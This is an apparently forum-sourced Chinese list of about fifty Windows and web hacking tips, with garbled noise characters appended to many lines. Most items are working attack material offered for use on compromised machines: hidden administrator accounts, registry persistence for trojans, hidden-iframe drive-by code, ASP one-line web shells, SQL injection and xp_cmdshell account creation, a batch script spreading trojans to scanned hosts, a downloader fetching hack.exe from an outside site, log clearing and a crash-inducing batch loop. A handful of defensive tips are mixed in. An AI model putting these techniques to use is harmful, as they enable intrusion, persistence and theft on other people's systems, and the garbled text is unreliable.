Xp系统修改权限防止病毒或木马等破坏系统,cmd下,9 B3 l& {: ^3 a" O% b
cacls C:\windows\system32 /G hqw20:R
0 s+ k9 t' V g' N; K思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
5 H1 E) C! N- a1 a, u X6 f恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F( b5 I% `9 r4 @" s9 q
, x( K9 k/ ~2 L& ^' F2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。3 ~8 w# R% d; t: F2 X+ W
7 x8 X$ r8 M+ H: i
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。/ K+ b _$ X# P
7 ]: H& L/ ^$ V4 W; h% p4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
) {; [! ^2 R' k. r5 b+ R2 }) x+ n6 E2 }- l) {9 L; W4 i
5、利用INF文件来修改注册表
9 |. _: V2 k2 w, F* j[Version]. h: |" a n8 O7 ]3 }+ I
Signature="$CHICAGO$"7 N" A8 ]4 f+ G4 X
[Defaultinstall]
3 h5 R6 i- D0 T b/ g/ C" vaddREG=Ating
# Y* S7 @' ?! a/ P' v7 ^[Ating]
8 b) a$ [) t' v2 F8 N$ S( M* m0 sHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
. v, v7 Q2 M+ l5 l以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' q, i6 Z6 p$ A, D9 x( h, Z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径3 L2 R) C0 n) }8 |5 R, U y
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, Z, {, g' N0 }6 s
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU7 j6 L$ s z+ p9 `
HKEY_CURRENT_CONFIG 简写为 HKCC
" z+ [/ B- r/ n w6 `0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值- f U: ^/ p4 i# B9 ]* z; d5 D
"1"这里代表是写入或删除注册表键值中的具体数据
5 B2 {* K# j/ z/ P
$ Y& ~; Z( o) C6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,& ]* N- z( Y! \
多了一步就是在防火墙里添加个端口,然后导出其键值
0 {; @, Q, C5 a4 N7 R4 w* k[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 E$ o; I7 ]+ U3 K, |" [7 |5 ~) L
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽8 ^ H$ r8 e. ^( P$ y6 m
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
9 s' Q* S$ ]0 I: z# J! q6 t+ V, W3 H2 J1 v6 b' u+ E
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! o) p4 m& s$ g; K0 d
; q) K7 z- v q% K" ]8 S0 y/ m9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,- Y- ~+ z; Y+ Z- a
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ G0 E. r/ n6 B' b4 y# K9 f
% g6 {$ |2 |. M/ c) ?* p. U10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& D+ Y0 W' p2 k; q5 I$ v; w6 H) x! J
2 o0 j ]- C' _+ k! t1 I
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,. @9 u* K1 _0 U2 |* g
用法:xsniff –pass –hide –log pass.txt
0 G: o7 R- j3 V' N( m
& ]5 D, h; c% Y7 |12、google搜索的艺术3 e; x |9 G- K' b
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
% q& I0 q4 b. x或“字符串的语法错误”可以找到很多sql注入漏洞。
$ K( N& j- h, d3 r
6 N) G' n! p% ]13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
$ C' \' Q( ?/ i6 ^# n, ? c V; O8 `/ R
' p7 _3 R8 g0 K14、cmd中输入 nc –vv –l –p 1987( b6 q. n: ]* |3 p1 w0 W% Y
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃+ A+ `7 W9 g8 [6 X8 ?; |4 e
( Q* ]8 \2 ?. ?/ A8 F' {15、制作T++木马,先写个ating.hta文件,内容为' p8 k! v* z' m. q
<script language="VBScript">; v& s9 [) k5 e: a
set wshshell=createobject ("wscript.shell" )% b- j% k H' K9 t, m" Y
a=wshshell.run("你马的名称",1)7 w8 ^2 g$ c2 `! k" t
window.close
! s# h. f8 F# ?! j& P: E# y1 T; b</script>. `" ]+ ?) j5 {: P) \( @
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: ~& l) Q6 b4 I# h, @; p. N4 C% |2 R: O, P/ o) }9 b% S
16、搜索栏里输入
$ q$ ` \/ y" ?. `+ [关键字%'and 1=1 and '%'='
3 ~% X) b- _! q5 g$ Y( a0 x2 t关键字%'and 1=2 and '%'='
7 G/ O0 S) d) Y5 ^- G% }: y' c比较不同处 可以作为注入的特征字符% `! U/ t8 d- z* V) Y8 }$ s
" w Z( ? d+ E/ ?) q# j* Q$ G
17、挂马代码<html>
- E+ N! ]. A& u) ~9 n<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) C8 y8 z7 r: m5 b/ Q7 R* q</html>
. m: n$ C6 a& F1 I4 y( U: `+ v& y& ]+ Y) y; F [% O
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
C( c. o7 t; P# Hnet localgroup administrators还是可以看出Guest是管理员来。% a. U* u0 b9 D* B' V8 g
: d" R- @- X3 @- n
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等# p' ], H3 ?8 {5 [. p
用法: 安装: instsrv.exe 服务名称 路径9 u# |# o( }2 G e" n" i) q
卸载: instsrv.exe 服务名称 REMOVE( Y5 a2 h3 M. @& j! m( Y
# @1 V: t9 c% a+ h. H4 P
1 Y0 h5 S) u8 p' {" i21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉( ~- s$ O8 G9 Q8 c# s
不能注入时要第一时间想到%5c暴库。3 o) L6 o8 Y9 w5 G2 A$ h! @
* h [" O" b) S9 D) a9 K9 ?3 I" v22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
& m+ h3 N% }6 {0 V. U1 h' g
) n9 O. O9 o6 L" y23、缺少xp_cmdshell时
$ \: N. [7 T; L7 E( ]4 A尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' F1 L! D* _. d% M* t# s假如恢复不成功,可以尝试直接加用户(针对开3389的)3 J, t& |9 e% P8 e* n" M4 t
declare @o int
6 |9 j: w! i0 g/ w, c2 p' Texec sp_oacreate 'wscript.shell',@o out0 j7 j1 Y V7 H# O
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' ~! z2 P( E) I$ E% _$ V
) e( `9 J( B; d0 y7 D24.批量种植木马.bat1 Q& W: F+ P% p0 e9 y0 P D4 p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 ]2 T3 L% p7 K Y# `' P6 [
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间5 a: L* C4 ]5 a
扫描地址.txt里每个主机名一行 用\\开头
2 C8 c! E9 L- i6 D0 t2 ^# y
- D* G1 {: r6 R25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
/ Y) N% g6 p- u. v- I( s+ q' q
9 ~& D; |0 [/ e' p26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.! o% l" ?% d- [# q; D% |9 [6 I
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
; a( {0 u4 m4 z1 }* s/ @7 q5 c+ {.cer 等后缀的文件夹下都可以运行任何后缀的asp木马3 U. h. @' |) M+ d3 K+ l
- S0 A/ r$ H" X- p4 `
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 y) B1 A+ m; ]8 v
然后用#clear logg和#clear line vty *删除日志% @- Y/ u- M$ X; r) j
1 d7 K( c5 V* P/ I! _. b28、电脑坏了省去重新安装系统的方法
7 y7 I4 h: x9 I' |2 q# U7 k# ^纯dos下执行,
, \6 o) ^- A1 m2 @" s0 w! Gxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config2 ?9 {- C& I1 e! y" {8 U
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config7 ]4 C! T. u1 _+ q
9 Z. }! m. ~) G+ w& I; a" _
29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 u5 v, {/ E3 i, q1 N4 LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
- Q: L l& I Z& K# V) xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip3 }- T' H/ E1 |
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( Y& Y) X3 A9 G; ~- {分别用
- ?' H; K: [- O, cregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' F7 L/ m+ y; e$ D0 w
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
1 i8 H4 O; S- [( G" m2 B2 x; Dregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
7 k5 ], g4 D/ \ I5 W- E% G; o命令来导出注册表项* ?9 L" y0 {$ k8 C( b$ p9 W; o
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 A5 _1 P9 G4 T' a" q. u改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: o$ f1 ~: C7 ~: j) N9 Uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
2 @; I5 Z) v, U4 k( l* T! }2 M7 @/ q, h' H8 Z) P
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
+ w9 S, }7 a5 T' xSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 }' I% `& w# ]; s# U) {8 e
+ L; s7 b; A. w5 ?2 t
31、全手工打造开3389工具
7 J3 r9 @% y. I4 {打开记事本,编辑内容如下:
8 P8 G' z$ b+ d9 o9 {echo [Components] > c:\sql
8 p4 [, i7 t. Y. @* decho TSEnable = on >> c:\sql
2 _; m, M; z* d6 ^" n! I5 qsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q# T; c7 _; c' v7 I
编辑好后存为BAT文件,上传至肉鸡,执行
1 s: g8 Z) b( w2 o: H2 M' j
p5 G; n( W) i7 i6 ~32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马7 ^; T6 U- s8 n2 a
; r! H$ @) P7 q( t! {
33、让服务器重启; G1 O, K. R4 n7 y+ ^* I9 C
写个bat死循环:
% U& \- ^4 g9 _! `% I( r@echo off! _1 ~& y1 I- C
:loop1$ r$ X: r3 Z( m
cls! Q3 z6 ~) X5 g V/ Y
start cmd.exe
$ k% L4 N0 i$ Y5 o, C h( Egoto loop1
8 N* S- l m' y保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
6 g* ]9 N/ Y7 n/ g" m
' f* ?% s6 S7 ?0 t! n f4 I: J34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 {/ y+ Z d* ~4 c9 s' G6 Q; q1 ?@echo off
( ]8 p. r1 U+ t4 |# m( B* ldate /t >c:/3389.txt% C7 |0 z+ Y# [* o4 [. y9 ^
time /t >>c:/3389.txt
j# `* Y1 ^3 Yattrib +s +h c:/3389.bat
7 R6 X" B2 B' a- ^2 F$ ^8 ?attrib +s +h c:/3389.txt
" o' @! R1 H- }netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt7 Q, w2 k* T6 D) a! B
并保存为3389.bat* l! g; w3 _% g2 R2 v
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
7 h8 K% A; S/ d9 g; U
$ q8 r1 O6 o t1 [0 _- U) V6 D$ R35、有时候提不了权限的话,试试这个命令,在命令行里输入:8 P( H6 d+ Z9 u" m* F4 ?! p
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- _0 w4 N3 Q7 m3 N
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 Q: x# H5 s4 M. f9 X/ U" H) h$ v+ M2 w
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) A. i/ l9 S( b# L0 e4 aecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
, g9 t: ]% h$ _* p5 necho 你的FTP账号 >>c:\1.bat //输入账号
8 \/ S1 b" L6 Q' l; N* \9 V8 oecho 你的FTP密码 >>c:\1.bat //输入密码- o7 I( x6 E3 ~! ^% c( b
echo bin >>c:\1.bat //登入 J, p* n6 L9 r" c/ i e
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
* g! r$ Y' n5 p% \4 m6 Becho bye >>c:\1.bat //退出
( E$ Q! [9 e4 F6 Q: W" \然后执行ftp -s:c:\1.bat即可
" T( h8 h9 ^9 S- b! [
/ ^- }$ p, }0 X: t/ n" i37、修改注册表开3389两法
8 G3 T1 _: S1 K! y; c(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表+ p( U0 V! e* ^. Y
echo Windows Registry Editor Version 5.00 >>3389.reg6 _/ S& [" v7 m$ M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
* p K/ @9 O' E# K/ E0 }echo "Enabled"="0" >>3389.reg6 L- ^6 t2 j( z5 ?% j
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, U/ M5 ~% p6 K& qNT\CurrentVersion\Winlogon] >>3389.reg- q3 g8 d+ a9 ^2 m z9 n+ `0 _
echo "ShutdownWithoutLogon"="0" >>3389.reg
2 } d, q% o5 b7 {( x( B( qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
2 U0 }$ U8 p* ^; i ~6 R$ L>>3389.reg
: d' k# a5 e1 O% h8 ~* q F1 N# n1 Oecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
) m) S. d/ s% N2 y' Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
8 y. H# d+ V& V! _6 `9 h>>3389.reg& t1 U- X8 @. _: w
echo "TSEnabled"=dword:00000001 >>3389.reg
9 R4 }: J0 p5 b9 c3 @ Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 c" U8 l, `8 Y* [; a% g4 wecho "Start"=dword:00000002 >>3389.reg) P# Y) ^8 v2 c1 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
3 N, @9 ?9 J$ S6 A/ Q4 U/ y- a>>3389.reg% B2 m. R3 }) e4 q w& Y2 h
echo "Start"=dword:00000002 >>3389.reg( p; G$ p# W$ q J5 v
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
5 R0 Q$ H+ S8 x1 w8 m2 j# a' decho "Hotkey"="1" >>3389.reg
4 P2 B6 s- p: U, w! z# j7 Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! f, P9 D, Q: p E/ @' C6 f V+ S
Server\Wds\rdpwd\Tds\tcp] >>3389.reg2 [/ R! C, `) }9 v
echo "PortNumber"=dword:00000D3D >>3389.reg
: S" ^; z0 E- e; fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% Q3 b' s5 T Y5 H6 m0 ~/ P
Server\WinStations\RDP-Tcp] >>3389.reg
8 x1 j, }1 R! `4 u O9 wecho "PortNumber"=dword:00000D3D >>3389.reg/ Q( L: t# D. Q& N5 |' u
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。) Q) g7 C5 S( k! u* }3 z( ]- C) [ f
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)# o U" q9 M% i h
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
& G. ]5 Y" e# z, m( M! ]6 o- }(2)winxp和win2003终端开启
, O: p: u" T# a用以下ECHO代码写一个REG文件:* v* ^ P" N- j% g; A7 i
echo Windows Registry Editor Version 5.00>>3389.reg. u) o% G' `4 R: ^ o0 P. {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 P6 _ o3 { E+ n( q) \; zServer]>>3389.reg8 M$ |4 Q U( O: ~0 ^/ [
echo "fDenyTSConnections"=dword:00000000>>3389.reg5 I& @0 K" K2 [, b1 _. b- {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 S3 U7 t7 f" q+ O; q; |Server\Wds\rdpwd\Tds\tcp]>>3389.reg
% w C- g* \4 L- I2 i% _1 D5 Kecho "PortNumber"=dword:00000d3d>>3389.reg
! H8 F0 `7 ^" n$ Y' o$ Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 }0 q' ^& ~# A& x" i0 H- z0 J
Server\WinStations\RDP-Tcp]>>3389.reg8 i$ B, E! B' b/ x8 l% n: j
echo "PortNumber"=dword:00000d3d>>3389.reg
- P0 i7 w) c( U) N: y) W$ \然后regedit /s 3389.reg del 3389.reg
4 [3 L# d- B8 _. wXP下不论开终端还是改终端端口都不需重启. i! n+ J& N- L" M
( ~/ U3 `; d6 a
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
" z+ }: v1 w5 o# l( |& I( H用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
4 Y- g! B8 G" z7 Q# ?* a
- [# d2 x7 H" U* I" U5 n$ k39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!( d" u. ~1 w" J/ H; F: c
(1)数据库文件名应复杂并要有特殊字符
8 c0 J$ ]1 Y6 K2 @3 R(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! d( L, M/ m" H y) |
将conn.asp文档中的 [3 x9 g8 J6 ^& h; ?) n
DBPath = Server.MapPath("数据库.mdb")
) n. {% M' g& C6 L% F0 \# H* qconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
) E" x) ~4 z: q3 T" Z3 R( [3 _% K$ D" c7 a1 J
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置) P+ Y# o# u5 t& x8 i
(3)不放在WEB目录里
$ P# n- e1 H. y0 \ z7 U9 }, U
+ J$ A2 o8 s) _2 z7 `1 @1 {( ?40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉; k3 d0 h7 P! i2 [% k' U. @7 P3 P1 X
可以写两个bat文件
; M- \# U$ C. K+ ~7 k@echo off# b' B! v) x {, S/ Q* [! Z5 N" X, ^ y
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( q8 _ }" @. G/ j@del c:\winnt\system32\query.exe% T# O. `# x, _
@del %SYSTEMROOT%\system32\dllcache\query.exe
8 \. [" ^$ t, P: {: m@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的: `; r8 W4 Q1 m, X$ K2 ~
0 V8 s2 h; n ~) y) a7 H1 w& G@echo off$ n9 f) w& U% w% i; r' m
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe- A. T" W c) M/ n, S
@del c:\winnt\system32\tsadmin.exe/ n4 _: X! i, H
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex! d9 x O1 Y) l7 W* p5 W5 \
2 C p: U; w2 {! c
41、映射对方盘符
; S4 U: J% l& C; ytelnet到他的机器上,
; L+ @8 x: j. r; c3 }net share 查看有没有默认共享 如果没有,那么就接着运行) r. V0 _# t- K6 w
net share c$=c:) ^* u8 r- C% d" B B" Y$ a
net share现在有c$. F% ` X: o! O; v) M
在自己的机器上运行- K# s3 z" V1 y# m- j
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
& E% ~+ M( o) g* [( \4 r1 f0 D8 O, G( E! e2 A$ g
42、一些很有用的老知识3 q+ ]: \- m9 R* y7 z
type c:\boot.ini ( 查看系统版本 )# v6 ?/ g* R% X1 {. y8 D7 L5 O) }& F
net start (查看已经启动的服务)
& U0 D2 O2 S) W/ `0 ]* S8 [# Nquery user ( 查看当前终端连接 )4 {5 J) ~8 |' \, S' r
net user ( 查看当前用户 )
) {+ X) s+ f, \6 p& @1 C; E. inet user 用户 密码/add ( 建立账号 )
, C9 `! A# `0 x$ Z+ }net localgroup administrators 用户 /add (提升某用户为管理员)
2 f/ V: n0 }" `1 F6 Y$ `ipconfig -all ( 查看IP什么的 )9 k$ b9 b% a6 \# ]3 o
netstat -an ( 查看当前网络状态 )% d0 G( [; d0 Y8 @8 F- a7 v
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# m! C% m/ ^3 Z: N% g3 D
克隆时Administrator对应1F44 a1 @8 j5 Z9 J& z6 w
guest对应1F56 x; S q9 M' N2 l
tsinternetuser对应3E8
' g: i6 f9 G2 k/ ]+ Q! b% e$ V4 i9 {" k+ e& S B
43、如果对方没开3389,但是装了Remote Administrator Service& H0 W2 K& S- f( f; l3 Z l% X9 \
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
( s3 }# j3 M0 T& ~1 s/ x2 A解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
) v" J) u9 B; ~: g! G! @7 }5 _9 ?先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
8 m! ]/ `+ e: f1 p! i3 X- s
# P* y. F5 r. J$ o44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)# I/ Q' V+ D) H) X X3 I2 U
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
- |' L& R3 Q3 N b. r. l1 R
: k' }2 H M- a45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
- a# ~* f ^3 x+ N _* J& Zecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open* u& ?# e, s# f8 W
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =9 j- [' z3 t7 X* P
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =" ]- |7 C* j2 N* g" {$ }
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs( j \- J# d. e% v1 K
(这是完整的一句话,其中没有换行符)" R; C( H5 t! Q1 s4 H i
然后下载:
5 N8 x( k1 R! A. | ^) [& R$ Pcscript down.vbs http://www.hack520.org/hack.exe hack.exe
# M- v( z$ h$ @1 _& ~) [6 N" S3 W3 E9 j2 Q& {9 k0 j. P
46、一句话木马成功依赖于两个条件:
& B. x1 h3 g3 J) P, v0 `$ n1、服务端没有禁止adodb.Stream或FSO组件: M7 e, X" d0 J: {4 d' Y
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。" ]+ I" l n! X! h* c8 {4 E% j; @
/ \9 g: f0 C* r& l
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 j6 M6 T8 z, x/ s& s( W;alter database utsz set RECOVERY FULL--
' } ^. p; g5 X) P" }4 A;create table cmd (a image)--
& _; a: a- D4 p5 @0 I' I$ `;backup log utsz to disk = 'D:\cmd' with init--
0 C, e1 X" Q# _, X( {$ f; |4 D;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
9 _; w2 }# e1 [2 o+ k;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
* W% u- q) P' C( E注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
0 J0 B' n$ w9 y0 L( W/ d+ }) n+ h9 z% D; |* k: C1 Q) \1 t) f
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! y0 I. v, V0 I+ s
2 ~3 W" S' H S! C+ e
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
" D( c2 ~# B0 t. r所有会话用 'all'。
. h% U( h6 c! r, C-s sessionid 列出会话的信息。
' \; k! n; h; r) Z-k sessionid 终止会话。 N7 }$ R7 B- {, Z
-m sessionid 发送消息到会话。
! \3 u# Z4 |6 `0 y( ^. Y; }5 D; q1 B" P% z9 }
config 配置 telnet 服务器参数。3 c! y4 q7 @- A
1 a* @ T! X3 e% g% ~ Y7 q
common_options 为:
0 Y, H/ O. Z0 g: N$ H-u user 指定要使用其凭据的用户
9 M8 {9 G/ a( v( T+ \9 e6 N3 Y-p password 用户密码+ C1 d4 g; | ^ J' M, E
7 y' o: E8 x& oconfig_options 为: k+ _' f( U m4 q5 b: n8 Q
dom = domain 设定用户的默认域
! W6 v. N% u% N) _6 _9 E$ @ctrlakeymap = yes|no 设定 ALT 键的映射0 u* @/ Y# C# F3 c) y$ G
timeout = hh:mm:ss 设定空闲会话超时值0 q) J; b( v7 f- b U- A1 M- c" b
timeoutactive = yes|no 启用空闲会话。
5 s4 A; a6 ^/ @% b- Smaxfail = attempts 设定断开前失败的登录企图数。
% ?2 q7 P9 Y& k6 S; I7 V; Emaxconn = connections 设定最大连接数。
6 {4 G: g+ i6 ~1 n: ^7 O5 {5 Oport = number 设定 telnet 端口。
& V$ k5 T; m" Fsec = [+/-]NTLM [+/-]passwd6 g! L/ D4 L! }. Y% j, b1 H: q! C
设定身份验证机构' j6 T# y# w8 h$ ]1 C1 A
fname = file 指定审计文件名。9 |0 j" L2 l. w3 T8 x
fsize = size 指定审计文件的最大尺寸(MB)。1 p/ p" w9 Z. K2 }) F
mode = console|stream 指定操作模式。4 {7 c& A6 M6 I3 F' ^
auditlocation = eventlog|file|both1 H! Q: G& m3 u, s& z2 s8 f7 ^
指定记录地点& D; @' {7 y9 N9 j8 v: ]
audit = [+/-]user [+/-]fail [+/-]admin, o0 G8 ]: r& N) E, Q
; o" z/ G! C( y- H49、例如:在IE上访问:
* Q: D2 y" t: Q: a$ @www.hack520.org/hack.txt就会跳转到http://www.hack520.org/8 `4 ?, } Q& `4 B/ h
hack.txt里面的代码是: T f1 e0 m1 Z/ ?
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">4 d7 u8 w. o+ L4 i$ V
把这个hack.txt发到你空间就可以了!
: W1 w, F5 M; k/ ?这个可以利用来做网马哦!" [/ Z3 @+ O& J! I
: F/ M6 L9 R1 t' x. o
50、autorun的病毒可以通过手动限制!
$ D% h3 Y6 z* o, m9 n$ i9 I1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
% B; T) J' |0 i/ o4 y2,打开盘符用右键打开!切忌双击盘符~4 y$ _) ?0 h( n: J+ a$ K0 z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区! }4 C9 x2 M# l% W& c& q# G
! F4 ~6 ^2 t- _3 t2 e8 O" l
51、log备份时的一句话木马:
, G& @4 o7 C, I( ga).<%%25Execute(request("go"))%%25>9 p$ y0 |6 y. X. E
b).<%Execute(request("go"))%>+ @4 i* I: {, O
c).%><%execute request("go")%><%* ^3 g% c6 z) u
d).<script language=VBScript runat=server>execute request("sb")</Script>$ p% P; R+ G9 Z& W
e).<%25Execute(request("l"))%25>
- p. t; X- T1 e6 y& m5 |8 ^f).<%if request("cmd")<>"" then execute request("pass")%>
1 ]& _: U2 e6 o& z( _/ Y& J& e8 h" {& W/ E' i
52、at "12:17" /interactive cmd
, m% G: z: \# d; v6 o. V执行后可以用AT命令查看新加的任务3 L$ J! D8 `) [- ?7 A8 u
